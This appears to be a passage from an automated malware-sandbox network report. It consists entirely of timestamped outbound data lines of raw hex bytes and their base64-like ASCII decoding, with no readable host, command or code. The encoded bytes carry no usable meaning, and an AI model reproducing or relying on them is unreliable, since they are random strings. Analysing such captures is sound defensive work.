                                                                                                                                                                                                              Data Ascii: icFZhec/OXBBpMv5sS9zPAFKfsicuWNa4OXVkg98LoGvlkUk0Paqz4uJ4uV93adeE5+WlWHUj1IrgVbWcjx0btTSym801jieoLnOk2Kl4yqq9nWx6FEMIHHeaRmPD7jT+0WqID6+xpoADH1LeRIOX9ai11tBkc/tDtVXcIfb8Zo85gktwfYJlBrwsMq71eXHObawJKoK0WEaNBlCMnSI4F7Apwapv4fOY4IbnQPqKK1HjUt87xNEgtK74n59qYz
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC12724OUTData Raw: 69 4d 52 6a 57 4d 35 41 5a 68 69 73 6f 74 53 47 77 31 64 36 31 6a 34 77 6a 44 77 31 39 6c 70 75 30 6d 6d 4b 53 4f 39 44 63 33 51 68 47 6f 75 57 7a 56 7a 42 7a 77 34 75 74 77 36 36 4a 62 38 52 7a 43 49 66 64 70 68 55 62 70 5a 62 71 2f 45 78 41 56 7a 78 68 6f 4f 38 57 66 64 66 77 67 57 66 38 34 43 34 68 79 75 74 50 78 7a 64 4e 41 55 59 4d 75 51 43 52 70 69 65 37 78 6d 51 79 33 51 55 32 32 76 4e 59 4e 6e 30 6e 6b 61 66 47 50 46 53 48 55 75 71 33 63 30 69 48 2b 54 4f 4f 4d 4d 2f 4c 67 73 49 67 71 4a 38 41 64 66 64 73 50 74 78 62 34 66 46 31 59 43 4b 4f 73 38 69 67 75 32 31 4d 44 6b 61 58 45 72 43 78 41 61 37 79 55 37 45 33 74 52 4c 56 5a 64 68 6a 35 46 49 73 61 4f 36 31 48 6e 6f 37 30 56 34 47 65 4e 74 4f 43 71 68 73 4e 35 79 6c 74 67 59 6a 68 34 47 44 37 45
                                                                                                                                                                                                              Data Ascii: iMRjWM5AZhisotSGw1d61j4wjDw19lpu0mmKSO9Dc3QhGouWzVzBzw4utw66Jb8RzCIfdphUbpZbq/ExAVzxhoO8WfdfwgWf84C4hyutPxzdNAUYMuQCRpie7xmQy3QU22vNYNn0nkafGPFSHUuq3c0iH+TOOMM/LgsIgqJ8AdfdsPtxb4fF1YCKOs8igu21MDkaXErCxAa7yU7E3tRLVZdhj5FIsaO61Hno70V4GeNtOCqhsN5yltgYjh4GD7E
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC12740OUTData Raw: 4e 6f 63 46 77 36 56 2f 79 2f 47 43 2f 55 45 50 74 33 57 74 51 4c 66 47 63 2f 69 48 4c 54 47 57 31 64 30 61 63 41 5a 52 34 67 49 6b 38 47 7a 2b 50 56 45 43 71 44 37 4b 76 73 6f 36 51 79 5a 52 68 39 76 67 4a 44 57 58 32 6f 73 71 33 41 6d 79 61 43 4d 42 2b 36 31 49 58 53 42 30 5a 66 51 35 71 66 6f 4c 58 53 71 41 49 73 66 37 62 56 4c 46 41 65 6f 69 52 53 56 50 43 53 39 72 74 45 33 78 45 4f 31 48 36 47 72 4c 53 49 6a 4a 6d 46 55 4f 78 6a 31 64 32 50 71 57 78 68 72 43 39 56 79 71 61 48 75 42 66 52 6f 58 38 4f 6f 76 66 67 63 7a 41 31 57 70 53 48 73 39 67 37 6f 73 51 5a 62 38 6d 76 6d 48 6d 37 42 66 45 4b 39 4f 6a 73 62 37 2f 39 65 70 48 66 50 78 61 78 30 50 6c 71 6a 63 43 47 42 6c 70 34 44 2f 4e 37 41 73 52 50 49 79 4f 32 45 62 35 53 75 64 6a 55 7a 2f 78 79 77
                                                                                                                                                                                                              Data Ascii: NocFw6V/y/GC/UEPt3WtQLfGc/iHLTGW1d0acAZR4gIk8Gz+PVECqD7Kvso6QyZRh9vgJDWX2osq3AmyaCMB+61IXSB0ZfQ5qfoLXSqAIsf7bVLFAeoiRSVPCS9rtE3xEO1H6GrLSIjJmFUOxj1d2PqWxhrC9VyqaHuBfRoX8OovfgczA1WpSHs9g7osQZb8mvmHm7BfEK9Ojsb7/9epHfPxax0PlqjcCGBlp4D/N7AsRPIyO2Eb5SudjUz/xyw
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC12756OUTData Raw: 38 38 53 58 75 4a 75 4e 41 50 6b 65 34 57 68 41 56 6d 41 73 64 39 53 33 32 6a 50 64 78 77 6f 46 73 4c 30 52 73 35 73 78 6e 7a 63 4f 43 4a 49 6c 70 66 75 52 74 49 41 62 59 2b 51 68 6f 74 68 73 73 64 46 56 4b 49 38 4a 4b 39 62 67 2b 39 30 46 74 36 2f 66 6b 79 44 4f 30 75 57 59 57 75 76 6b 76 70 55 53 54 57 79 48 77 46 7a 37 36 59 4f 45 45 4f 2b 6a 44 64 49 4b 54 72 33 54 66 68 67 44 78 56 42 52 71 53 4a 52 42 48 6f 78 46 6c 72 41 4a 62 39 61 71 6b 59 2b 57 4a 38 43 58 4c 47 6c 41 4f 34 33 6b 6c 61 70 67 52 57 73 57 2f 53 4f 2b 66 56 34 2b 6c 35 2f 39 39 57 37 61 42 4f 69 74 69 4d 6c 63 61 39 43 35 64 51 33 6c 66 4b 61 4b 32 39 78 37 6e 73 47 53 6f 58 4f 64 50 65 6f 46 32 2b 6a 46 38 48 46 2b 58 44 63 43 62 75 57 33 61 65 51 4b 6d 66 6c 65 53 6f 41 39 4d 67
                                                                                                                                                                                                              Data Ascii: 88SXuJuNAPke4WhAVmAsd9S32jPdxwoFsL0Rs5sxnzcOCJIlpfuRtIAbY+QhothssdFVKI8JK9bg+90Ft6/fkyDO0uWYWuvkvpUSTWyHwFz76YOEEO+jDdIKTr3TfhgDxVBRqSJRBHoxFlrAJb9aqkY+WJ8CXLGlAO43klapgRWsW/SO+fV4+l5/99W7aBOitiMlca9C5dQ3lfKaK29x7nsGSoXOdPeoF2+jF8HF+XDcCbuW3aeQKmfleSoA9Mg
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC12772OUTData Raw: 67 46 72 4e 77 59 48 48 79 4a 76 42 64 57 43 75 2f 4f 6e 57 31 2b 70 7a 6e 70 54 6b 7a 41 67 65 4e 6e 64 32 62 4d 7a 4c 4b 76 75 6e 73 73 58 77 43 73 71 43 78 4b 76 38 34 34 36 77 4f 64 6d 59 66 48 67 4f 30 30 35 33 51 33 47 58 63 63 6d 70 4a 58 49 30 6d 33 2f 2f 48 30 73 41 6e 53 70 4a 54 51 55 56 49 70 4e 4a 46 77 76 47 72 69 5a 2f 38 55 44 55 51 6e 4b 47 36 38 42 2b 4d 4d 5a 67 6e 77 74 4b 34 65 6a 54 4c 48 4c 48 62 76 38 69 6e 62 44 6d 71 6a 67 63 37 51 54 67 66 67 77 79 4b 4f 70 4b 41 6a 33 46 65 77 45 55 39 42 46 6f 62 36 61 4b 66 38 4f 34 46 50 72 34 6b 38 57 6f 66 70 78 5a 6b 41 49 2b 54 53 4e 34 50 33 2b 59 66 6a 33 61 64 70 6c 69 49 71 6d 38 5a 63 7a 77 77 48 4d 4c 78 54 52 4a 6b 66 78 52 73 4a 6c 66 36 4f 74 34 49 33 41 44 70 56 61 48 45 47 71
                                                                                                                                                                                                              Data Ascii: gFrNwYHHyJvBdWCu/OnW1+pznpTkzAgeNnd2bMzLKvunssXwCsqCxKv8446wOdmYfHgO0053Q3GXccmpJXI0m3//H0sAnSpJTQUVIpNJFwvGriZ/8UDUQnKG68B+MMZgnwtK4ejTLHLHbv8inbDmqjgc7QTgfgwyKOpKAj3FewEU9BFob6aKf8O4FPr4k8WofpxZkAI+TSN4P3+Yfj3adpliIqm8ZczwwHMLxTRJkfxRsJlf6Ot4I3ADpVaHEGq
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC12788OUTData Raw: 47 77 48 4a 4d 45 62 79 75 72 42 61 35 77 76 39 72 36 76 64 39 70 75 4c 35 56 4e 57 47 6e 54 45 4f 77 71 46 58 49 7a 68 57 53 42 72 64 63 74 4e 62 54 5a 41 30 5a 49 72 33 57 6f 68 46 41 77 64 58 38 46 44 58 52 44 4d 59 6b 5a 72 71 75 2b 48 2b 61 31 2b 42 68 4d 76 67 49 57 5a 51 6f 47 48 72 47 50 70 31 41 74 61 31 44 41 7a 49 35 36 76 2b 4d 52 32 34 43 66 4e 2b 55 34 6e 72 66 43 33 63 35 38 4e 51 4a 37 6f 58 36 4b 41 69 78 34 48 33 49 65 78 70 53 36 36 65 4e 6a 56 45 7a 5a 4d 73 6d 47 44 52 37 79 6b 4b 74 48 76 4c 47 67 51 6f 41 4d 68 61 63 58 47 6a 36 65 6f 69 6e 4a 32 7a 41 79 65 66 47 65 35 66 56 71 4b 69 56 4b 36 6e 67 4e 6a 30 36 67 7a 55 2f 79 63 39 63 6b 32 62 38 49 4a 51 33 30 6e 4c 58 65 51 32 50 70 61 57 44 32 44 62 5a 63 64 75 33 66 6f 55 63 53
                                                                                                                                                                                                              Data Ascii: GwHJMEbyurBa5wv9r6vd9puL5VNWGnTEOwqFXIzhWSBrdctNbTZA0ZIr3WohFAwdX8FDXRDMYkZrqu+H+a1+BhMvgIWZQoGHrGPp1Ata1DAzI56v+MR24CfN+U4nrfC3c58NQJ7oX6KAix4H3IexpS66eNjVEzZMsmGDR7ykKtHvLGgQoAMhacXGj6eoinJ2zAyefGe5fVqKiVK6ngNj06gzU/yc9ck2b8IJQ30nLXeQ2PpaWD2DbZcdu3foUcS
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC12804OUTData Raw: 2f 2f 6c 44 70 4e 62 56 74 77 2f 73 2f 2f 4c 67 67 57 37 64 73 57 67 5a 6c 4d 73 42 66 52 2b 2f 39 62 45 7a 79 73 74 58 34 6d 42 46 43 56 30 2f 69 65 74 74 39 71 41 39 71 63 76 76 33 66 39 4f 52 76 2f 56 39 4f 73 59 47 6e 76 50 79 30 39 50 56 68 4f 53 62 45 5a 6c 67 4e 2b 37 48 68 53 34 74 78 5a 4f 31 72 6d 78 35 51 77 47 46 6d 59 74 69 44 46 33 33 61 2b 33 66 79 6f 71 73 56 72 72 7a 76 6c 2f 49 52 77 67 2b 39 33 4f 48 49 4e 64 4b 6c 42 63 51 6c 75 77 4e 77 76 63 43 52 6d 55 41 77 4f 45 39 4f 36 31 4c 32 59 54 6c 51 48 65 37 6e 32 4a 72 64 69 41 47 57 42 31 53 6b 71 30 69 36 51 70 34 39 61 53 79 69 75 68 79 76 59 75 38 65 37 6e 4c 6d 43 52 34 44 6b 4a 41 44 71 6d 76 4b 46 33 70 45 4e 4b 6d 58 59 6d 5a 58 49 65 72 67 59 45 6c 46 54 2b 36 39 77 42 4b 75 4e
                                                                                                                                                                                                              Data Ascii: //lDpNbVtw/s//LggW7dsWgZlMsBfR+/9bEzystX4mBFCV0/iett9qA9qcvv3f9ORv/V9OsYGnvPy09PVhOSbEZlgN+7HhS4txZO1rmx5QwGFmYtiDF33a+3fyoqsVrrzvl/IRwg+93OHINdKlBcQluwNwvcCRmUAwOE9O61L2YTlQHe7n2JrdiAGWB1Skq0i6Qp49aSyiuhyvYu8e7nLmCR4DkJADqmvKF3pENKmXYmZXIergYElFT+69wBKuN
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC12820OUTData Raw: 2b 4e 32 51 5a 4a 64 55 6d 56 7a 76 69 6d 50 47 61 2b 36 52 41 72 6c 65 35 59 4f 42 32 43 4b 57 4c 68 67 54 53 51 41 41 6d 61 4d 7a 35 65 31 59 2b 59 4d 2b 6e 69 37 31 34 53 62 61 4a 4a 72 36 50 61 2f 51 32 44 77 6d 74 70 47 44 30 33 50 62 4c 39 75 6b 69 32 61 4d 73 44 37 68 77 4d 72 38 47 44 48 31 69 70 4c 50 6f 4c 46 2f 37 4e 79 2b 2b 59 4f 76 4e 70 35 6c 48 35 35 69 6c 78 35 6d 6f 52 71 56 58 61 5a 7a 65 69 4b 64 77 33 37 44 47 31 77 6f 45 6c 4d 50 50 4c 6a 2b 75 36 69 36 6b 35 52 6c 64 49 62 58 59 6c 75 71 4d 67 75 48 65 4e 38 31 2f 49 55 42 4f 5a 31 44 34 72 73 77 56 45 70 78 6a 50 79 79 52 4b 37 6a 34 79 75 7a 79 61 59 6b 51 4e 45 74 65 58 66 6b 47 41 7a 4f 65 64 50 77 71 4d 33 64 53 4b 68 75 55 46 6a 54 58 6b 62 64 46 75 39 53 59 50 62 68 73 6a 78
                                                                                                                                                                                                              Data Ascii: +N2QZJdUmVzvimPGa+6RArle5YOB2CKWLhgTSQAAmaMz5e1Y+YM+ni714SbaJJr6Pa/Q2DwmtpGD03PbL9uki2aMsD7hwMr8GDH1ipLPoLF/7Ny++YOvNp5lH55ilx5moRqVXaZzeiKdw37DG1woElMPPLj+u6i6k5RldIbXYluqMguHeN81/IUBOZ1D4rswVEpxjPyyRK7j4yuzyaYkQNEteXfkGAzOedPwqM3dSKhuUFjTXkbdFu9SYPbhsjx
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC12836OUTData Raw: 74 74 6c 35 6a 65 30 59 76 52 6d 7a 7a 6a 74 59 6b 51 48 4f 57 51 49 72 67 30 76 53 59 47 69 4b 78 48 63 4a 41 38 50 4f 49 66 67 39 4e 5a 6e 7a 72 55 69 57 35 78 34 59 64 73 6c 63 4f 6c 52 52 68 4a 64 2b 4d 42 76 58 78 4c 44 49 7a 6d 6f 64 75 6e 64 36 73 6d 62 67 46 32 69 73 35 4b 32 45 6b 70 67 55 69 59 56 52 77 55 74 61 4b 74 58 78 32 52 32 62 37 50 44 5a 4b 4d 58 57 6f 62 6e 37 48 6a 38 54 79 39 72 70 63 33 72 55 48 64 47 32 59 53 46 33 66 51 37 59 35 68 52 50 73 50 63 79 67 66 62 49 62 47 6a 47 6f 57 46 59 71 5a 49 53 32 49 6d 6b 59 51 65 46 7a 75 48 37 46 4e 53 31 36 6e 53 52 30 63 6c 79 6d 2b 59 69 76 64 6f 4d 58 43 48 6b 72 4c 68 48 4c 2b 63 61 61 62 52 69 4d 42 67 67 79 47 48 78 4d 67 66 47 6b 54 63 78 4f 43 78 59 4d 72 35 49 52 74 39 55 44 49 68
                                                                                                                                                                                                              Data Ascii: ttl5je0YvRmzzjtYkQHOWQIrg0vSYGiKxHcJA8POIfg9NZnzrUiW5x4YdslcOlRRhJd+MBvXxLDIzmodund6smbgF2is5K2EkpgUiYVRwUtaKtXx2R2b7PDZKMXWobn7Hj8Ty9rpc3rUHdG2YSF3fQ7Y5hRPsPcygfbIbGjGoWFYqZIS2ImkYQeFzuH7FNS16nSR0clym+YivdoMXCHkrLhHL+caabRiMBggyGHxMgfGkTcxOCxYMr5IRt9UDIh
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC12852OUTData Raw: 67 48 61 46 73 4a 4c 41 6a 55 69 55 32 43 2f 64 36 54 6c 61 6f 49 65 6b 4d 56 67 49 68 4b 50 45 57 39 38 54 48 6f 57 58 74 42 6e 4b 33 61 50 46 45 55 62 44 67 37 39 58 42 77 73 43 4a 74 45 4a 61 64 34 78 72 73 58 30 4f 6c 33 64 4e 6d 69 33 37 72 35 36 63 42 75 44 6d 45 4f 73 76 79 65 6d 41 38 7a 4d 39 53 6a 65 39 50 6a 79 49 31 70 69 2f 75 54 79 2b 43 73 6a 35 41 49 65 4c 4a 2b 4b 6e 2f 33 2b 74 35 77 47 34 6b 6a 4f 35 47 51 49 7a 78 4d 67 55 71 46 2b 73 41 32 78 57 70 50 6b 4e 78 33 6b 75 48 63 48 37 62 30 54 6c 33 38 30 50 6c 35 4b 65 35 4d 48 55 62 59 4c 35 75 46 52 77 58 43 39 34 61 4a 58 2f 4f 2f 44 77 79 76 64 51 79 48 33 6b 73 78 4a 38 31 31 6b 33 7a 45 4b 4d 44 52 69 75 43 58 39 73 47 79 68 6f 45 39 66 55 70 6d 4f 67 71 53 69 41 73 38 78 34 74 6a
                                                                                                                                                                                                              Data Ascii: gHaFsJLAjUiU2C/d6TlaoIekMVgIhKPEW98THoWXtBnK3aPFEUbDg79XBwsCJtEJad4xrsX0Ol3dNmi37r56cBuDmEOsvyemA8zM9Sje9PjyI1pi/uTy+Csj5AIeLJ+Kn/3+t5wG4kjO5GQIzxMgUqF+sA2xWpPkNx3kuHcH7b0Tl380Pl5Ke5MHUbYL5uFRwXC94aJX/O/DwyvdQyH3ksxJ811k3zEKMDRiuCX9sGyhoE9fUpmOgqSiAs8x4tj
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC12868OUTData Raw: 70 51 6c 77 75 6a 33 35 44 2f 6f 77 6b 52 55 6e 67 45 43 74 71 4d 77 7a 55 63 44 31 33 44 2f 46 37 75 43 76 67 33 58 36 49 4f 4c 38 42 49 4c 54 65 34 76 70 64 57 6a 66 5a 57 38 44 77 37 2f 2b 34 61 6b 57 77 45 49 56 44 77 33 5a 77 67 53 6e 62 61 30 63 2f 36 6a 74 5a 42 4f 49 54 49 39 70 43 2b 31 48 36 53 6d 4f 36 4f 76 31 41 48 35 6d 48 32 7a 51 4a 50 46 55 6a 44 51 42 74 6c 30 61 34 2b 75 49 74 6e 55 74 58 68 37 32 4c 4c 66 76 39 56 38 71 73 4a 64 67 36 77 73 42 4c 42 44 48 30 61 54 68 2f 4b 34 34 5a 62 72 34 54 56 4a 31 4a 47 6f 33 55 33 6d 74 6b 73 54 34 6d 30 6a 71 41 66 6b 51 64 57 2f 39 77 36 6d 6d 79 55 6f 6d 61 76 61 57 7a 6d 6e 79 77 61 73 37 34 4d 6a 52 36 30 61 64 4f 37 41 78 6c 6f 35 44 4e 79 77 55 79 36 4d 77 42 58 6e 6a 74 37 67 34 68 36 4c
                                                                                                                                                                                                              Data Ascii: pQlwuj35D/owkRUngECtqMwzUcD13D/F7uCvg3X6IOL8BILTe4vpdWjfZW8Dw7/+4akWwEIVDw3ZwgSnba0c/6jtZBOITI9pC+1H6SmO6Ov1AH5mH2zQJPFUjDQBtl0a4+uItnUtXh72LLfv9V8qsJdg6wsBLBDH0aTh/K44Zbr4TVJ1JGo3U3mtksT4m0jqAfkQdW/9w6mmyUomavaWzmnywas74MjR60adO7Axlo5DNywUy6MwBXnjt7g4h6L
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC12884OUTData Raw: 71 2f 33 6e 63 4f 36 2b 43 54 58 46 43 4d 68 45 38 35 76 6b 45 34 70 2f 6b 30 42 57 78 69 53 69 44 63 6a 6c 43 72 72 76 58 71 32 65 51 50 6c 37 6e 30 4b 56 63 51 6d 76 38 38 6d 67 4c 48 62 59 52 49 63 4e 79 71 34 30 32 62 79 4a 75 37 36 64 68 53 59 36 4c 68 70 4c 4b 47 4c 50 4a 2b 58 45 58 49 4f 79 43 75 48 74 41 76 77 43 70 6a 6c 51 52 79 65 78 45 64 79 45 32 45 78 36 4c 43 52 6f 32 4b 6f 4f 6c 7a 7a 50 5a 52 49 44 52 68 2f 4a 75 64 4b 46 58 5a 76 6e 44 6c 69 4c 41 35 78 42 7a 30 7a 37 63 79 79 38 45 4c 75 32 6e 72 4d 50 79 61 4f 6c 6a 76 71 6c 7a 75 2f 65 58 35 6d 39 35 74 6b 53 35 61 39 6b 37 6c 44 6c 47 7a 59 67 6f 72 71 50 2b 57 4b 72 77 4d 6c 6b 35 4d 56 71 50 32 52 57 4f 57 33 6f 7a 32 49 78 68 6a 48 7a 66 46 66 5a 37 31 6b 59 4e 36 47 52 30 33 42
                                                                                                                                                                                                              Data Ascii: q/3ncO6+CTXFCMhE85vkE4p/k0BWxiSiDcjlCrrvXq2eQPl7n0KVcQmv88mgLHbYRIcNyq402byJu76dhSY6LhpLKGLPJ+XEXIOyCuHtAvwCpjlQRyexEdyE2Ex6LCRo2KoOlzzPZRIDRh/JudKFXZvnDliLA5xBz0z7cyy8ELu2nrMPyaOljvqlzu/eX5m95tkS5a9k7lDlGzYgorqP+WKrwMlk5MVqP2RWOW3oz2IxhjHzfFfZ71kYN6GR03B
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC12900OUTData Raw: 6a 47 51 74 73 6b 7a 68 58 67 31 59 6f 48 71 33 6d 49 79 76 66 43 63 56 36 39 6f 57 4a 42 66 2b 59 47 35 35 55 6e 79 6a 62 4b 4c 2f 4e 45 38 35 74 76 4d 4e 63 58 4e 6c 44 34 66 5a 50 70 31 39 50 44 38 2f 77 38 55 38 33 58 6f 79 2f 61 71 47 43 2b 37 74 2b 63 54 74 7a 75 6c 45 42 79 66 6d 75 6f 55 70 5a 45 35 45 72 4a 57 42 49 36 2f 33 48 4e 54 71 32 55 54 56 69 32 45 47 44 7a 6a 44 53 78 62 61 39 41 46 32 6a 33 59 41 30 41 37 4f 77 34 6a 76 78 44 48 63 65 55 6a 58 6c 70 76 46 68 39 58 69 55 50 51 6a 39 2f 6f 52 73 78 36 33 4b 50 73 46 6f 4d 4c 53 65 44 57 6e 51 71 42 77 78 6e 35 30 79 36 39 66 4c 2b 77 2b 48 31 50 6b 36 64 76 58 34 46 47 6e 7a 76 62 49 4e 43 65 2f 73 5a 4b 78 6b 6b 56 33 5a 32 6a 42 7a 7a 6f 41 62 4f 38 58 34 4f 72 71 70 43 6e 65 6f 2f 43
                                                                                                                                                                                                              Data Ascii: jGQtskzhXg1YoHq3mIyvfCcV69oWJBf+YG55UnyjbKL/NE85tvMNcXNlD4fZPp19PD8/w8U83Xoy/aqGC+7t+cTtzulEByfmuoUpZE5ErJWBI6/3HNTq2UTVi2EGDzjDSxba9AF2j3YA0A7Ow4jvxDHceUjXlpvFh9XiUPQj9/oRsx63KPsFoMLSeDWnQqBwxn50y69fL+w+H1Pk6dvX4FGnzvbINCe/sZKxkkV3Z2jBzzoAbO8X4OrqpCneo/C
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC12916OUTData Raw: 6d 61 43 59 59 59 76 65 43 70 33 68 70 67 2b 53 69 33 66 4b 58 6d 76 2f 73 75 6c 4d 43 33 2b 32 68 74 2b 4c 4b 67 46 33 2f 6f 6d 51 39 51 78 7a 65 56 32 43 65 52 4c 4d 34 42 42 43 65 35 2b 2b 68 48 78 6a 54 6f 6c 38 36 35 38 4a 50 44 67 76 31 4f 35 41 4c 58 7a 6f 61 32 51 35 50 59 44 31 58 6a 43 30 4e 4f 61 33 77 4b 2b 39 35 30 32 36 49 72 56 53 32 4f 39 64 39 56 34 39 41 39 43 4b 79 59 6d 6c 37 34 52 33 4a 52 38 37 68 75 57 65 43 6e 6d 49 49 7a 57 4e 42 53 44 35 72 4d 56 51 65 49 6c 2f 4a 54 52 78 55 4a 50 7a 45 47 71 39 6d 68 47 36 59 32 64 59 32 7a 67 76 55 36 70 69 74 6c 63 70 4b 55 77 66 5a 32 70 4e 44 6e 4a 76 7a 31 37 4e 33 65 64 41 41 41 44 44 77 38 38 4c 78 6e 54 51 48 48 57 45 76 54 4b 56 75 50 2b 69 74 6f 35 6a 68 76 73 49 71 46 44 32 73 50 41
                                                                                                                                                                                                              Data Ascii: maCYYYveCp3hpg+Si3fKXmv/sulMC3+2ht+LKgF3/omQ9QxzeV2CeRLM4BBCe5++hHxjTol8658JPDgv1O5ALXzoa2Q5PYD1XjC0NOa3wK+95026IrVS2O9d9V49A9CKyYml74R3JR87huWeCnmIIzWNBSD5rMVQeIl/JTRxUJPzEGq9mhG6Y2dY2zgvU6pitlcpKUwfZ2pNDnJvz17N3edAAADDw88LxnTQHHWEvTKVuP+ito5jhvsIqFD2sPA
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC12932OUTData Raw: 62 4b 59 75 56 48 4b 33 43 63 4b 57 47 52 64 57 64 78 4d 61 5a 2b 39 63 4d 6d 66 70 57 78 30 6b 42 47 69 52 57 71 47 31 41 72 36 61 59 45 4c 61 4e 55 5a 4e 4a 47 52 59 57 2f 35 49 4c 47 63 4c 37 72 2f 41 76 33 52 46 46 37 31 35 79 4a 64 32 41 7a 51 6b 7a 50 36 74 4c 70 51 33 61 72 4a 58 30 35 56 4d 7a 6c 4e 33 42 2b 77 61 42 54 74 72 6d 62 37 4b 74 58 49 53 49 37 6e 65 48 36 64 74 42 6d 44 63 79 59 71 78 4a 70 2f 2b 56 63 65 53 32 76 4e 67 31 59 32 4d 6d 43 39 67 68 62 42 2b 35 4e 2b 6a 71 74 42 4c 65 4a 61 4d 33 2b 57 35 4c 2b 4f 78 69 5a 69 39 5a 49 67 5a 2b 50 42 43 49 76 77 50 32 39 77 63 57 5a 43 75 77 42 73 77 6d 48 58 39 79 56 71 69 76 4b 72 67 68 67 35 74 67 70 68 69 73 38 72 36 79 6b 38 59 42 55 6b 37 73 66 78 43 52 44 73 78 58 45 6b 55 6e 39 68
                                                                                                                                                                                                              Data Ascii: bKYuVHK3CcKWGRdWdxMaZ+9cMmfpWx0kBGiRWqG1Ar6aYELaNUZNJGRYW/5ILGcL7r/Av3RFF715yJd2AzQkzP6tLpQ3arJX05VMzlN3B+waBTtrmb7KtXISI7neH6dtBmDcyYqxJp/+VceS2vNg1Y2MmC9ghbB+5N+jqtBLeJaM3+W5L+OxiZi9ZIgZ+PBCIvwP29wcWZCuwBswmHX9yVqivKrghg5tgphis8r6yk8YBUk7sfxCRDsxXEkUn9h
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC12948OUTData Raw: 59 68 48 33 34 6b 38 70 6c 39 2b 71 33 30 65 54 41 39 6c 5a 53 43 38 31 37 48 56 30 72 57 48 68 5a 58 78 37 6a 77 45 55 41 67 43 70 4a 48 59 6c 46 4d 72 51 64 66 4d 45 43 45 5a 48 68 51 61 56 54 45 35 37 64 59 4c 54 66 78 4b 65 43 2b 6d 50 30 4f 75 69 66 73 75 74 6c 6e 43 46 78 64 32 39 68 74 67 42 32 46 70 51 75 7a 48 73 39 52 4e 73 6c 4b 6e 67 32 61 67 76 4d 36 62 73 6d 66 74 4d 70 78 55 58 59 6f 67 61 52 42 70 33 76 69 71 68 75 45 4d 7a 6c 65 52 42 6c 69 52 63 33 44 62 63 6b 75 65 38 4b 43 70 56 66 53 57 32 6d 47 55 67 73 4a 66 73 73 4d 37 48 79 73 2f 50 72 33 74 75 77 6e 63 78 2f 30 7a 63 46 51 39 38 54 63 73 4a 54 30 31 39 55 49 47 57 78 2f 50 63 62 75 50 45 36 55 33 79 72 52 74 38 63 4c 6e 6b 4a 37 31 37 30 7a 30 39 43 4c 75 46 4c 56 4e 32 6b 37 65
                                                                                                                                                                                                              Data Ascii: YhH34k8pl9+q30eTA9lZSC817HV0rWHhZXx7jwEUAgCpJHYlFMrQdfMECEZHhQaVTE57dYLTfxKeC+mP0OuifsutlnCFxd29htgB2FpQuzHs9RNslKng2agvM6bsmftMpxUXYogaRBp3viqhuEMzleRBliRc3Dbckue8KCpVfSW2mGUgsJfssM7Hys/Pr3tuwncx/0zcFQ98TcsJT019UIGWx/PcbuPE6U3yrRt8cLnkJ7170z09CLuFLVN2k7e
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC12964OUTData Raw: 47 5a 63 36 78 68 79 6a 4e 50 46 4c 37 58 32 61 57 4a 62 76 47 69 6e 36 59 66 36 73 62 44 41 4e 48 66 4c 59 71 31 4e 6c 36 36 4e 4b 7a 5a 54 30 4e 46 52 72 38 52 32 31 61 48 45 66 73 4c 4e 33 34 6f 72 78 31 66 46 44 45 46 6f 6d 71 79 76 78 36 78 69 4a 2f 6c 46 66 74 5a 54 5a 6f 71 75 47 76 43 4d 6e 74 77 75 56 5a 43 42 45 58 6d 4c 51 43 37 33 75 47 62 72 52 4c 58 2b 63 71 34 4d 6b 38 30 39 71 61 44 50 42 6d 57 46 4b 50 46 54 54 31 4c 45 54 79 64 33 42 48 32 4b 6e 2f 67 4f 2f 56 32 6c 38 79 7a 6a 34 41 42 50 6a 62 4e 42 6c 6b 4c 56 61 61 39 68 4b 6b 41 37 59 4f 30 47 59 30 79 42 55 4b 6d 51 77 47 67 2f 6e 63 51 34 66 4a 71 39 4e 2b 74 34 58 37 6b 6d 4c 2f 74 44 2f 2f 5a 6c 6f 68 63 64 56 30 68 70 41 5a 36 30 6e 31 65 46 53 64 31 5a 47 74 58 4d 59 4b 6a 55
                                                                                                                                                                                                              Data Ascii: GZc6xhyjNPFL7X2aWJbvGin6Yf6sbDANHfLYq1Nl66NKzZT0NFRr8R21aHEfsLN34orx1fFDEFomqyvx6xiJ/lFftZTZoquGvCMntwuVZCBEXmLQC73uGbrRLX+cq4Mk809qaDPBmWFKPFTT1LETyd3BH2Kn/gO/V2l8yzj4ABPjbNBlkLVaa9hKkA7YO0GY0yBUKmQwGg/ncQ4fJq9N+t4X7kmL/tD//ZlohcdV0hpAZ60n1eFSd1ZGtXMYKjU
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC12980OUTData Raw: 52 54 35 51 38 46 67 48 6a 56 37 6f 32 7a 76 71 45 46 36 4c 57 73 6b 56 51 76 39 75 66 79 4b 53 6e 37 63 43 51 39 78 4f 79 37 55 33 7a 6a 32 6c 31 4b 75 35 73 41 75 79 72 4f 4d 76 49 56 38 49 51 36 4e 53 6e 4c 67 2b 62 6a 72 30 5a 77 6d 58 70 5a 79 41 48 53 61 63 6c 77 76 79 47 32 33 4b 6f 47 4c 65 36 74 78 39 57 73 6d 68 79 57 43 36 64 57 50 74 51 2f 35 79 79 48 34 48 54 61 34 30 34 4b 4c 54 54 66 79 75 73 70 72 69 65 69 66 67 55 58 75 62 6e 69 50 79 62 46 5a 6c 45 56 44 48 4f 6d 2b 4f 50 64 4c 46 30 77 73 33 34 57 70 4a 37 64 7a 63 5a 31 52 4a 54 72 53 4b 33 69 48 52 59 68 77 52 51 58 41 72 67 45 6a 56 75 47 57 2f 33 39 65 70 37 6b 6d 30 50 73 67 42 39 69 41 6b 72 4f 6c 75 32 33 4c 38 4f 4d 50 4a 43 70 34 67 50 41 67 38 79 49 46 34 4e 56 78 50 71 6d 4c
